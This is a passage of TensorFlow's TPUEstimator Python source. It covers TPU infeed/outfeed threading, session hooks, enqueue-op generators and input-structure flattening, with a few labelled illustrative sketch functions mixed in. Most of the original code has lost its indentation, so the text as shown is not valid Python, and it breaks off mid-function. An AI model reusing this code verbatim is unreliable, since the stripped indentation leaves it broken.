graph = ops.get_default_graph()
collection_name = "{}_{}".format(_TPU_ESTIMATOR, _ITERATIONS_PER_LOOP_VAR)
iter_vars = graph.get_collection(collection_name)
if len(iter_vars) == 1:
return iter_vars[0]
elif len(iter_vars) > 1:
raise RuntimeError("Multiple iterations_per_loop_var in collection.")
with ops.colocate_with(training_util.get_global_step()):
with variable_scope.variable_scope(
_TPU_ESTIMATOR, reuse=variable_scope.AUTO_REUSE
):
return variable_scope.get_variable(
_ITERATIONS_PER_LOOP_VAR,
initializer=init_ops.zeros_initializer(),
shape=[],
dtype=dtypes.int32,
trainable=False,
collections=[collection_name, ops.GraphKeys.LOCAL_VARIABLES],
use_resource=True,
)
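# A small illustrative sketch (not used by TPUEstimator): the per-loop values
# described in the docstring above can be reproduced in plain Python.
# `total_steps` and `iterations_per_loop` are hypothetical parameter names
# invented for this example.
def _example_iterations_per_loop_schedule(total_steps, iterations_per_loop):
    """Yields the value the variable would take before each TPU execution."""
    remaining = total_steps
    while remaining > 0:
        yield min(iterations_per_loop, remaining)
        remaining -= iterations_per_loop

# list(_example_iterations_per_loop_schedule(10, 4)) == [4, 4, 2]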
def _sync_variables_ops():
# Gets the variables back from TPU nodes. This means the variables updated
# by TPU will now be *synced* to host memory.
return [
array_ops.check_numerics(v.read_value(), "Gradient for %s is NaN" % v.name).op
for v in variables.trainable_variables()
]
def _increase_eval_step_op(iterations_per_loop):
"""Returns an op to increase the eval step for TPU evaluation.
Args:
iterations_per_loop: Tensor. The number of eval steps running in TPU
system before returning to CPU host for each `Session.run`.
Returns:
An operation
"""
eval_step = (
evaluation._get_or_create_eval_step()
) # pylint: disable=protected-access
# Estimator.evaluate increments the eval step by 1 per Session.run by default,
# so we add the remaining difference here.
return state_ops.assign_add(
eval_step,
math_ops.cast(iterations_per_loop - 1, dtype=eval_step.dtype),
use_locking=True,
)
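# Worked example (illustrative only): with iterations_per_loop == 4, the
# Estimator's own eval loop adds 1 per Session.run, and the op above adds the
# remaining 4 - 1 == 3, so the eval step counter advances by 4 in total.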
def _extract_key_names(tensor_or_dict):
if isinstance(tensor_or_dict, dict):
return sorted(tensor_or_dict.keys())
return []
class _SIGNAL(object):
"""Signal used to control the thread of infeed/outfeed.
All reserved signals must be negative numbers. Positive numbers are used to
indicate the number of iterations for the next training/evaluation loop.
"""
NEXT_BATCH = -1
STOP = -2
class TPUEstimatorSpec(
model_fn_lib._TPUEstimatorSpec
): # pylint: disable=protected-access
"""Ops and objects returned from a `model_fn` and passed to `TPUEstimator`.
See `EstimatorSpec` for `mode`, `predictions`, `loss`, `train_op`, and
`export_outputs`.
For evaluation, `eval_metrics` is a tuple of `metric_fn` and `tensors`, where
`metric_fn` runs on CPU to generate metrics and `tensors` represents the
`Tensor`s transferred from TPU system to CPU host and passed to `metric_fn`.
To be precise, TPU evaluation expects a slightly different signature from the
@{tf.estimator.Estimator}. While `EstimatorSpec.eval_metric_ops` expects a
dict, `TPUEstimatorSpec.eval_metrics` is a tuple of `metric_fn` and `tensors`.
The `tensors` could be a list of `Tensor`s or dict of names to `Tensor`s. The
`tensors` usually specify the model logits, which are transferred back from
TPU system to CPU host. All tensors must be batch-major, i.e., the batch
size is the first dimension. Once all tensors are available at the CPU host
from all shards, they are concatenated (on CPU) and passed as positional
arguments to the `metric_fn` if `tensors` is a list, or as keyword arguments if
`tensors` is a dict. `metric_fn` takes the `tensors` and returns a dict from
metric string name to the result of calling a metric function, namely a
`(metric_tensor, update_op)` tuple. See `TPUEstimator` for an MNIST example of
how to specify `eval_metrics`.
`scaffold_fn` is a function running on CPU to generate the `Scaffold`. This
function should not capture any Tensors in `model_fn`.
`host_call` is a tuple of a `function` and a list or dictionary of `tensors`
to pass to that function; the function returns a list of Tensors. `host_call`
currently works for train() and evaluate(). The Tensors returned by the
function are evaluated on the CPU on every step, so there is communication
overhead when sending tensors from TPU to CPU. To reduce the overhead, try
reducing the size of the tensors. The `tensors` are concatenated along their
major (batch) dimension, and so must be >= rank 1. The `host_call` is useful
for writing summaries with @{tf.contrib.summary.create_file_writer}.
"""
def __new__(
cls,
mode,
predictions=None,
loss=None,
train_op=None,
eval_metrics=None,
export_outputs=None,
scaffold_fn=None,
host_call=None,
training_hooks=None,
evaluation_hooks=None,
prediction_hooks=None,
):
"""Creates a validated `TPUEstimatorSpec` instance."""
host_calls = {}
if eval_metrics is not None:
host_calls["eval_metrics"] = eval_metrics
if host_call is not None:
host_calls["host_call"] = host_call
_OutfeedHostCall.validate(host_calls)
training_hooks = list(training_hooks or [])
evaluation_hooks = list(evaluation_hooks or [])
prediction_hooks = list(prediction_hooks or [])
for hook in training_hooks + evaluation_hooks + prediction_hooks:
if not isinstance(hook, session_run_hook.SessionRunHook):
raise TypeError(
"All hooks must be SessionRunHook instances, given: {}".format(hook)
)
return super(TPUEstimatorSpec, cls).__new__(
cls,
mode=mode,
predictions=predictions,
loss=loss,
train_op=train_op,
eval_metrics=eval_metrics,
export_outputs=export_outputs,
scaffold_fn=scaffold_fn,
host_call=host_call,
training_hooks=training_hooks,
evaluation_hooks=evaluation_hooks,
prediction_hooks=prediction_hooks,
)
def as_estimator_spec(self):
"""Creates an equivalent `EstimatorSpec` used by CPU train/eval."""
host_calls = {}
if self.eval_metrics is not None:
host_calls["eval_metrics"] = self.eval_metrics
if self.host_call is not None:
host_calls["host_call"] = self.host_call
host_call_ret = _OutfeedHostCall.create_cpu_hostcall(host_calls)
eval_metric_ops = None
if self.eval_metrics is not None:
eval_metric_ops = host_call_ret["eval_metrics"]
hooks = None
if self.host_call is not None:
hooks = [_OutfeedHostCallHook(host_call_ret["host_call"])]
hooks = list(hooks or [])
scaffold = self.scaffold_fn() if self.scaffold_fn else None
return model_fn_lib.EstimatorSpec(
mode=self.mode,
predictions=self.predictions,
loss=self.loss,
train_op=self.train_op,
eval_metric_ops=eval_metric_ops,
export_outputs=self.export_outputs,
scaffold=scaffold,
training_hooks=self.training_hooks + hooks,
evaluation_hooks=self.evaluation_hooks + hooks,
prediction_hooks=self.prediction_hooks + hooks,
)
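# A minimal, hypothetical sketch (not part of this module) of the
# `eval_metrics` contract documented above: `metric_fn` runs on the CPU host
# and receives the dequeued, concatenated `tensors` as keyword arguments.
# `_example_eval_model_fn` and `my_metric_fn` are names invented solely for
# this illustration; `features` is assumed to be a single Tensor.
def _example_eval_model_fn(features, labels, mode, params):
    import tensorflow as tf  # local import to keep the sketch self-contained

    logits = tf.reduce_mean(features, axis=-1)  # stand-in for a real model
    loss = tf.reduce_mean(tf.squared_difference(logits, labels))

    def my_metric_fn(labels, logits):
        # Each value is a (metric_tensor, update_op) pair, as in EstimatorSpec.
        return {
            "mean_label": tf.metrics.mean(labels),
            "mean_logit": tf.metrics.mean(logits),
        }

    return TPUEstimatorSpec(
        mode=mode,
        loss=loss,
        eval_metrics=(my_metric_fn, {"labels": labels, "logits": logits}),
    )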
class _OpQueueContext(object):
"""Manages work queue and thread for a infeed/outfeed thread."""
def __init__(self, name, target, args):
self._name = name
self._queue = Queue.Queue()
args = (self,) + args
self._thread = threading.Thread(name=name, target=target, args=args)
self._thread.daemon = True
self._thread.start()
def stop(self):
self._queue.put(_SIGNAL.STOP)
def send_next_batch_signal(self, iterations):
self._queue.put(iterations)
def read_iteration_counts(self):
while True:
iterations = self._queue.get(block=True)
logging.debug("%s read iterations %s", self._name, iterations)
if iterations == _SIGNAL.STOP:
logging.info("%s received shutdown signal, stopping.", self._name)
return
yield iterations
def join(self):
logging.info("Shutting down %s thread." % self._name)
self.stop()
self._thread.join()
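# Illustrative sketch (hypothetical, not part of this module): how a thread
# target consumes the signalling protocol above. The real targets are
# TPUInfeedOutfeedSessionHook._run_infeed/_run_outfeed further below;
# `session` and `enqueue_ops` are assumed names for this example.
def _example_queue_worker(queue_ctx, session, enqueue_ops):
    # read_iteration_counts() yields until a STOP signal is queued by join().
    for steps in queue_ctx.read_iteration_counts():
        for _ in xrange(steps):
            session.run(enqueue_ops)

# Hypothetical wiring:
#   ctx = _OpQueueContext("Example", _example_queue_worker, (session, enqueue_ops))
#   ctx.send_next_batch_signal(4)   # worker runs 4 iterations
#   ctx.join()                      # queues STOP and waits for the thread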
class _OpSignalOnceQueueContext(_OpQueueContext):
"""Manages work queue and thread for a infeed/outfeed thread.
This subclass only signals once.
"""
def __init__(self, name, target, args):
super(_OpSignalOnceQueueContext, self).__init__(name, target, args)
self._has_signaled = False
def send_next_batch_signal(self, iterations):
if not self._has_signaled:
self._queue.put(iterations)
self._has_signaled = True
class TPUInfeedOutfeedSessionHook(session_run_hook.SessionRunHook):
"""A Session hook setting up the TPU initialization, infeed, and outfeed.
This hook does two major things:
1. initialize and shut down the TPU system.
2. launch and join the threads for infeed enqueue and (optional) outfeed
dequeue.
"""
def __init__(
self,
ctx,
enqueue_ops,
dequeue_ops,
run_infeed_loop_on_coordinator=True,
rendezvous=None,
):
self._master_job = ctx.master_job
self._enqueue_ops = enqueue_ops
self._dequeue_ops = dequeue_ops
self._rendezvous = rendezvous
self._run_infeed_loop_on_coordinator = run_infeed_loop_on_coordinator
self._initial_infeed_sleep_secs = (
ctx.config.tpu_config.initial_infeed_sleep_secs
)
self._feed_error = None
self._finished = False
def begin(self):
logging.info("TPU job name %s", self._master_job)
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
self._init_ops = [tpu.initialize_system(job=self._master_job)]
self._finalize_ops = [tpu.shutdown_system(job=self._master_job)]
summary_writer_init_ops = contrib_summary.summary_writer_initializer_op()
self._init_ops.extend(summary_writer_init_ops)
# Get all the writer resources from the initializer, so we know what to
# flush.
for op in summary_writer_init_ops:
self._finalize_ops.append(contrib_summary.flush(writer=op.inputs[0]))
def _run_infeed(self, queue_ctx, session):
logging.info("Starting infeed thread controller.")
if self._initial_infeed_sleep_secs:
logging.info(
"%s thread sleeping for %d seconds.",
self._name,
self._initial_infeed_sleep_secs,
)
time.sleep(self._initial_infeed_sleep_secs)
logging.info("%s thread starting after sleep", self._name)
with self._rendezvous.catch_errors(source="infeed", session=session):
if self._run_infeed_loop_on_coordinator:
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug("Infeed enqueue for iteration (%d, %d)", count, i)
session.run(self._enqueue_ops)
else:
for _ in queue_ctx.read_iteration_counts():
session.run(self._enqueue_ops)
logging.info("Infeed thread finished, shutting down.")
def _run_outfeed(self, queue_ctx, session):
logging.info("Starting outfeed thread controller.")
with self._rendezvous.catch_errors(source="outfeed", session=session):
for count, steps in enumerate(queue_ctx.read_iteration_counts()):
for i in xrange(steps):
logging.debug("Outfeed dequeue for iteration (%d, %d)", count, i)
session.run(self._dequeue_ops)
logging.info("Outfeed thread finished, shutting down.")
def _create_infeed_controller(self, name, target, args):
return _OpQueueContext(name=name, target=target, args=args)
def after_create_session(self, session, coord):
logging.info("Init TPU system")
session.run(
self._init_ops, options=config_pb2.RunOptions(timeout_in_ms=5 * 60 * 1000)
)
self._infeed_controller = self._create_infeed_controller(
name="InfeedController", target=self._run_infeed, args=(session,)
)
self._outfeed_controller = _OpQueueContext(
name="OutfeedController", target=self._run_outfeed, args=(session,)
)
def before_run(self, run_context):
self._feed_error = None
iterations = run_context.session.run(self._iterations_per_loop_var)
logging.info("Enqueue next (%d) batch(es) of data to infeed.", iterations)
self._infeed_controller.send_next_batch_signal(iterations)
logging.info("Dequeue next (%d) batch(es) of data from outfeed.", iterations)
self._outfeed_controller.send_next_batch_signal(iterations)
def end(self, session):
self._finished = True
logging.info("Stop infeed thread controller")
self._infeed_controller.join()
self._rendezvous.record_done("infeed")
logging.info("Stop output thread controller")
self._outfeed_controller.join()
self._rendezvous.record_done("outfeed")
logging.info("Shutdown TPU system.")
session.run(self._finalize_ops)
class TPUInfeedOutfeedSessionHookForPrediction(TPUInfeedOutfeedSessionHook):
def __init__(self, ctx, enqueue_ops, dequeue_ops, rendezvous=None):
super(TPUInfeedOutfeedSessionHookForPrediction, self).__init__(
ctx,
enqueue_ops,
dequeue_ops,
run_infeed_loop_on_coordinator=False,
rendezvous=rendezvous,
)
def _create_infeed_controller(self, name, target, args):
return _OpSignalOnceQueueContext(name=name, target=target, args=args)
class _TPUStopAtStepHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step.
This hook is similar to the `session_run_hook._StopAfterNEvalsHook` with the
following differences for TPU training:
1. This hook sets the variable for iterations_per_loop, which is used by
`TPUInfeedOutfeedSessionHook` to control the iterations for infeed/outfeed.
As the hook execution order is not guaranteed, the variable update is
handled in `after_create_session` and `after_run` as
`TPUInfeedOutfeedSessionHook` reads the variable value in `before_run`.
2. For each training loop (session.run), the global step could be increased
multiple times on TPU. The global step tensor value will be explicitly read
again in `after_run` to ensure the latest value is retrieved to avoid race
condition.
"""
def __init__(self, iterations, num_steps=None, last_step=None):
"""Initializes a `StopAtStepHook`.
Args:
iterations: The number of iterations to run optimizer per training loop.
num_steps: Number of steps to execute.
last_step: Step after which to stop.
Raises:
ValueError: If one of the arguments is invalid.
"""
if num_steps is None and last_step is None:
raise ValueError("One of num_steps or last_step must be specified.")
if num_steps is not None and last_step is not None:
raise ValueError("Only one of num_steps or last_step can be specified.")
self._num_steps = num_steps
self._last_step = last_step
self._iterations = iterations
def _next_iterations(self, global_step, last_step):
gap = last_step - global_step
return min(gap, self._iterations)
def begin(self):
self._global_step_tensor = training_util.get_global_step()
if self._global_step_tensor is None:
raise RuntimeError("Global step should be created.")
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
global_step = session.run(self._global_step_tensor)
if self._last_step is None:
self._last_step = global_step + self._num_steps
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(iterations, session=session)
def after_run(self, run_context, run_values):
# Global step cannot be retrieved via SessionRunArgs and before_run due to
# race condition.
global_step = run_context.session.run(self._global_step_tensor)
if global_step >= self._last_step:
run_context.request_stop()
else:
iterations = self._next_iterations(global_step, self._last_step)
self._iterations_per_loop_var.load(iterations, session=run_context.session)
class _SetEvalIterationsHook(session_run_hook.SessionRunHook):
"""Hook that requests stop at a specified step."""
def __init__(self, num_steps):
"""Initializes a `_SetEvalIterationsHook`.
Args:
num_steps: Number of steps to execute.
"""
self._num_steps = num_steps
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
self._iterations_per_loop_var.load(self._num_steps, session=session)
class _StoppingPredictHook(session_run_hook.SessionRunHook):
"""Hook that requests stop according to the stopping signal in prediction."""
def __init__(self, scalar_stopping_signal):
self._scalar_stopping_signal = scalar_stopping_signal
def begin(self):
self._iterations_per_loop_var = _create_or_get_iterations_per_loop()
def after_create_session(self, session, coord):
# This is not strictly necessary, as we do not run infeed enqueue and outfeed
# dequeue in side threads for the prediction model. But it lets the
# TPUInfeedOutfeedSessionHook print a nicer message.
self._iterations_per_loop_var.load(1, session=session)
def before_run(self, run_context):
return session_run_hook.SessionRunArgs(self._scalar_stopping_signal)
def after_run(self, run_context, run_values):
_ = run_context
scalar_stopping_signal = run_values.results
if _StopSignals.should_stop(scalar_stopping_signal):
# NOTE(xiejw): In prediction, stopping signals are inserted for each
# batch. And we append one more batch to signal the system it should stop.
# The data flow might look like
#
# batch 0: images, labels, stop = 0 (user provided)
# batch 1: images, labels, stop = 0 (user provided)
# ...
# batch 99: images, labels, stop = 0 (user provided)
# batch 100: images, labels, stop = 1 (TPUEstimator appended)
#
# where the final batch (id = 100) is appended by TPUEstimator, so we
# should drop it before returning the predictions to the user.
# To achieve that, we throw the OutOfRangeError in after_run. Once
# MonitoredSession sees this error in SessionRunHook.after_run, the
# "current" prediction, i.e., the batch with id=100, will be discarded
# immediately.
raise errors.OutOfRangeError(None, None, "Stopped by stopping signal.")
def generate_per_core_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, host_device, host_id
):
"""Generates infeed enqueue ops for per-core input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A fn returns enqueue_ops."""
num_cores_per_host = ctx.num_of_cores_per_host
per_host_sharded_inputs = []
for core_ordinal in range(num_cores_per_host):
with ops.name_scope("ordinal_%d" % (core_ordinal)):
user_context = tpu_context.TPUContext(
internal_ctx=ctx,
input_device=host_device,
invocation_index=host_id * ctx.num_of_cores_per_host + core_ordinal,
)
inputs = _Inputs.from_input_fn(input_fn(user_context))
if inputs.is_dataset:
raise TypeError(
"`input_fn` returning `Dataset` is not yet supported in "
"per-Core input pipeline deployment yet. Please set "
"TPUConfig.per_host_input_for_training to True or return "
"`features` and `labels` from `input_fn`"
)
features, labels = inputs.features_and_labels()
inputs_structure_recorder.validate_and_record_structure(
features, labels
)
flattened_inputs = inputs_structure_recorder.flatten_features_and_labels(
features, labels
)
per_host_sharded_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0])
)
captured_infeed_queue.capture(infeed_queue)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs, tpu_ordinal_function=tpu_ordinal_function_impl
)
return per_host_enqueue_ops
return enqueue_ops_fn, captured_infeed_queue
def generate_per_host_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, batch_axis, device, host_id
):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
hooks = []
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id
)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
"For mode PREDICT, `input_fn` must return `Dataset` instead of "
"`features` and `labels`."
)
if batch_axis is not None:
raise TypeError("For mode PREDICT, batch_axis is not supported yet.")
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
)
if is_dataset:
hooks.append(inputs.dataset_initializer_hook())
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""A Fn returning the TPU infeed enqueue ops.
By providing this as a Fn, it can be invoked inside the tf.while_loop so that
the input pipeline for multiple iterations can be executed in one
Session.run call.
Returns:
list of dict of ops.
"""
with ops.device(device):
num_of_replicas_per_host = ctx.num_of_replicas_per_host
# Convert user input to features and labels. If the user returns a
# dataset, it is initialized and the features and labels extracted via
# `dataset.iterator.get_next()`
features, labels = inputs.features_and_labels()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(features, labels)
unsharded_tensor_list = inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals
)
infeed_queue = tpu_feed.InfeedQueue(
tuple_types=[t.dtype for t in unsharded_tensor_list],
tuple_shapes=[t.shape for t in unsharded_tensor_list],
shard_dimensions=batch_axis,
)
captured_infeed_queue.capture(infeed_queue)
infeed_queue.set_number_of_shards(num_of_replicas_per_host)
per_host_enqueue_ops = infeed_queue.split_inputs_and_generate_enqueue_ops(
unsharded_tensor_list,
placement_function=lambda x: device,
tpu_ordinal_function=tpu_ordinal_function_impl,
)
if signals is None:
return per_host_enqueue_ops
else:
return {"ops": per_host_enqueue_ops, "signals": signals}
return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
def generate_per_host_v2_enqueue_ops_fn_for_host(
ctx, input_fn, inputs_structure_recorder, device, host_id
):
"""Generates infeed enqueue ops for per-host input_fn on a single host."""
captured_infeed_queue = _CapturedObject()
hooks = []
with ops.device(device):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device, invocation_index=host_id
)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if not is_dataset:
raise TypeError(
"`input_fn` must return a `Dataset` for the PER_HOST_V2 "
"input pipeline configuration."
)
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
num_invocations_per_step=ctx.num_of_replicas_per_host,
)
hooks.append(inputs.dataset_initializer_hook())
tpu_ordinal_function_impl = ctx.tpu_ordinal_function(host_id)
def enqueue_ops_fn():
"""Generates the per_host enqueue ops."""
control_deps = []
per_host_sharded_inputs = []
num_replicas_per_host = ctx.num_of_replicas_per_host
cached_signals = None
with ops.device(device):
if not inputs.is_dataset:
raise TypeError("`input_fn` must return a `Dataset` for this mode.")
for _ in range(num_replicas_per_host):
# Use control dependencies to ensure a deterministic ordering.
with ops.control_dependencies(control_deps):
features, labels = inputs.features_and_labels() # Calls get_next()
signals = inputs.signals()
# All replicas share replica 0's stopping signal.
# This avoids inconsistent state among different model replicas.
if cached_signals:
signals["stopping"] = cached_signals["stopping"]
else:
cached_signals = signals
inputs_structure_recorder.validate_and_record_structure(
features, labels
)
flattened_inputs = inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals
)
control_deps.extend(flattened_inputs)
per_host_sharded_inputs.append(flattened_inputs)
if inputs_structure_recorder.flattened_input_dims:
input_partition_dims = inputs_structure_recorder.flattened_input_dims
if signals:
input_partition_dims += [None] * len(signals)
# pylint: disable=protected-access
infeed_queue = tpu_feed._PartitionedInfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0]),
host_id=host_id,
input_partition_dims=input_partition_dims,
device_assignment=ctx.device_assignment,
)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs
)
else:
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(per_host_sharded_inputs[0])
)
per_host_enqueue_ops = infeed_queue.generate_enqueue_ops(
per_host_sharded_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
)
captured_infeed_queue.capture(infeed_queue)
if signals is None:
return per_host_enqueue_ops
else:
return {"ops": per_host_enqueue_ops, "signals": signals}
return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
def generate_broadcast_enqueue_ops_fn(
ctx, input_fn, inputs_structure_recorder, num_hosts
):
"""Generates infeed enqueue ops for one input_fn on all the hosts."""
captured_infeed_queue = _CapturedObject()
hooks = []
device_0 = ctx.tpu_host_placement_function(host_id=0)
with ops.device(device_0):
user_context = tpu_context.TPUContext(
internal_ctx=ctx, input_device=device_0, invocation_index=0
)
inputs = _Inputs.from_input_fn(input_fn(user_context))
is_dataset = inputs.is_dataset
if ctx.mode == model_fn_lib.ModeKeys.PREDICT:
if not is_dataset:
raise TypeError(
"For mode PREDICT, `input_fn` must return `Dataset` instead of "
"`features` and `labels`."
)
inputs = _InputsWithStoppingSignals(
dataset=inputs.dataset,
batch_size=ctx.batch_size_for_input_fn,
add_padding=True,
)
if is_dataset:
hooks.append(inputs.dataset_initializer_hook())
num_replicas_per_host = ctx.num_of_replicas_per_host
def tpu_ordinal_function_impl(replica_id):
if ctx.device_assignment:
return ctx.device_assignment.tpu_ordinal(replica=replica_id)
else:
return replica_id % num_replicas_per_host
def device_function_impl(replica_id):
return ctx.tpu_host_placement_function(replica_id=replica_id)
def enqueue_ops_fn():
"""Generates enqueue ops for all the hosts."""
broadcasted_inputs = []
flattened_inputs = None # Cache result from input_fn.
signals = None
for host_id in xrange(num_hosts):
with ops.device(ctx.tpu_host_placement_function(host_id=host_id)):
for _ in xrange(ctx.num_of_replicas_per_host):
# Note: input_fn is only called once at host 0 for the first replica.
# The features and labels returned from that invocation are
# broadcast to the other replicas (including the replicas on other
# hosts).
if flattened_inputs is None:
features, labels = (
inputs.features_and_labels()
) # Calls get_next()
signals = inputs.signals()
inputs_structure_recorder.validate_and_record_structure(
features, labels
)
flattened_inputs = inputs_structure_recorder.flatten_features_and_labels(
features, labels, signals
)
broadcasted_inputs.append(flattened_inputs)
infeed_queue = tpu_feed.InfeedQueue(
number_of_tuple_elements=len(broadcasted_inputs[0])
)
captured_infeed_queue.capture(infeed_queue)
enqueue_ops = infeed_queue.generate_enqueue_ops(
broadcasted_inputs,
tpu_ordinal_function=tpu_ordinal_function_impl,
placement_function=device_function_impl,
)
if signals is None:
return enqueue_ops
else:
return {"ops": enqueue_ops, "signals": signals}
return enqueue_ops_fn, captured_infeed_queue, hooks, is_dataset
class _InputPipeline(object):
"""`_InputPipeline` handles invoking `input_fn` and piping to infeed queue.
`_InputPipeline` abstracts the per-core/per-host `input_fn` invocation from
call site. To be precise, based on the configuration in
`_InternalTPUContext`, it invokes `input_fn` for all cores (usually
multi-host TPU training) or for one host (usually for single-host TPU
evaluation), and sends all `features` and `labels` returned by `input_fn` to
TPU infeed. For per-core invocation, `features` and `labels` are piped to
infeed directly, one tuple for each core. For per-host invocation, `features`
and `labels` are split at host (with respect to `batch_axis`) and piped to all
cores accordingly.
In addition, flatten/unflatten are handled by `_InputPipeline` also. Model
inputs returned by the `input_fn` can have one of the following forms:
1. features
2. (features, labels)
3. ((arbitrarily nested structure of features), labels)
Internally, form 1 is reformed to `(features, None)` as features and labels
are passed separately to underlying methods. For TPU training, TPUEstimator
may expect multiple `features` and `labels` tuples, one for each core.
TPUEstimator allows various different structures for inputs (namely `features`
and `labels`). `features` can be `Tensor`, dict of string name to `Tensor`,
or nested tuples and `labels` could be `None`, `Tensor`, or dict of string
name to `Tensor`. The TPU infeed/outfeed library expects a flattened tensor
list, so `features` and `labels` need to be flattened before infeed enqueue,
and their structure needs to be recorded in order to restore them after
infeed dequeue.
"""
class InputsStructureRecorder(object):
"""The recorder to record inputs structure."""
def __init__(self, input_partition_dims=None):
# Holds the structure of inputs
self._feature_structure = {}
self._flattened_input_dims = None
if input_partition_dims:
# This should have been validated in TPUConfig.
assert len(input_partition_dims) <= 2, "must have 1 or 2 elements."
if len(input_partition_dims) == 2:
self._feature_dims, self._label_dims = input_partition_dims
else:
self._feature_dims = input_partition_dims[0]
self._label_dims = None
assert self._feature_dims is not None, (
"input_partition_dims[0] must " "not be None"
)
else:
self._feature_dims = None
self._label_dims = None
# Internal state.
self._initialized = False
@property
def flattened_input_dims(self):
assert self._initialized, "InputsStructureRecorder is not initialized."
return self._flattened_input_dims
def has_labels(self):
return "labels" in self._feature_structure
def _flatten_input_dims(
self,
feature_dims,
feature_dims_names,
label_dims,
label_dims_names,
label_names,
has_labels,
):
"""Flatten input dims with the same order as flattened input tensors."""
flattened_input_dims = []
if feature_dims_names:
# We need a fixed ordering for matching the tensors in features.
flattened_input_dims.extend(
[feature_dims[name] for name in feature_dims_names]
)
else:
flattened_input_dims.append(feature_dims)
if label_dims_names:
# We need a fixed ordering for matching the tensors in labels.
flattened_input_dims.extend(
[label_dims[name] for name in label_dims_names]
)
else:
if label_names:
num_tensors_in_label = len(label_names)
else:
num_tensors_in_label = int(has_labels)
# Setting `None` in input_partition_dims[1] will apply `None` to
# all the tensors in labels, regardless of internal structure.
flattened_input_dims.extend([label_dims] * num_tensors_in_label)
return flattened_input_dims
def validate_and_record_structure(self, features, labels):
"""Validates and records the structure of `features` and `labels`."""
# Extract structure.
has_labels = labels is not None
feature_names = _extract_key_names(features)
label_names = _extract_key_names(labels)
if not self._initialized:
# Record structure.
self._initialized = True
if self._feature_dims is not None:
feature_dims_names = _extract_key_names(self._feature_dims)
if feature_dims_names != feature_names:
raise ValueError(
"TPUConfig.input_partition_dims[0] mismatched feature"
" keys. Expected {}, got {}".format(
feature_names, feature_dims_names
)
)
label_dims_names = _extract_key_names(self._label_dims)
if self._label_dims is not None and label_dims_names != label_names:
raise ValueError(
"TPUConfig.input_partition_dims[1] mismatched label"
" keys. Expected {}, got {}".format(
label_names, label_dims_names
)
)
self._flattened_input_dims = self._flatten_input_dims(
self._feature_dims,
feature_dims_names,
self._label_dims,
label_dims_names,
label_names,
has_labels,
)
def flatten_features_and_labels(self, features, labels, signals=None):
"""Flattens the `features` and `labels` to a single tensor list."""
self._feature_structure["features"] = features
if labels is not None:
self._feature_structure["labels"] = labels
if signals is not None:
self._feature_structure["signals"] = signals
return data_nest.flatten(self._feature_structure)
def unflatten_features_and_labels(self, flattened_inputs):
"""Restores the flattened inputs to original features and labels form.
Args:
flattened_inputs: Flattened inputs for each shard.
Returns:
A tuple of (`features`, `labels`), where `labels` could be None.
Each one, if present, should have the same structure (single tensor vs
dict) as the one returned by input_fn.
Raises:
ValueError: If the number of expected tensors from `flattened_inputs`
mismatches the recorded structure.
"""
unflattened_inputs = data_nest.pack_sequence_as(
self._feature_structure, flattened_inputs
)
return _Inputs(
unflattened_inputs["features"],
unflattened_inputs.get("labels"),
signals=unflattened_inputs.get("signals"),
)
def __init__(self, input_fn, batch_axis, ctx):
"""Constructor.
Args:
input_fn: input fn for train or eval.
batch_axis: A python tuple of int values describing how each tensor
produced by the Estimator `input_fn` should be split across the TPU
compute shards.
ctx: A `_InternalTPUContext` instance with mode.
Raises:
ValueError: If both `sharded_features` and `num_cores` are `None`.
"""
self._inputs_structure_recorder = _InputPipeline.InputsStructureRecorder(
ctx.input_partition_dims
)
self._sharded_per_core = ctx.is_input_sharded_per_core()
self._input_fn = input_fn
self._infeed_queue = None
self._ctx = ctx
self._batch_axis = batch_axis
def generate_infeed_enqueue_ops_and_dequeue_fn(self):
"""Generates infeed enqueue ops and dequeue_fn."""
# When tf.while_loop is called, the body function, which invokes the
# `enqueue_fn` passed in, is called to construct the graph, so the input_fn
# structure is recorded.
enqueue_ops, all_hooks, run_infeed_loop_on_coordinator = (
self._invoke_input_fn_and_record_structure()
)
self._validate_input_pipeline()
def dequeue_fn():
"""dequeue_fn is used by TPU to retrieve the tensors."""
# In the model-parallel case, both the host-side and device-side
# computations must agree on the core on which infeed takes place. We
# choose to perform infeed on logical core 0 of each replica.
values = self._infeed_queue.generate_dequeue_op(tpu_device=0)
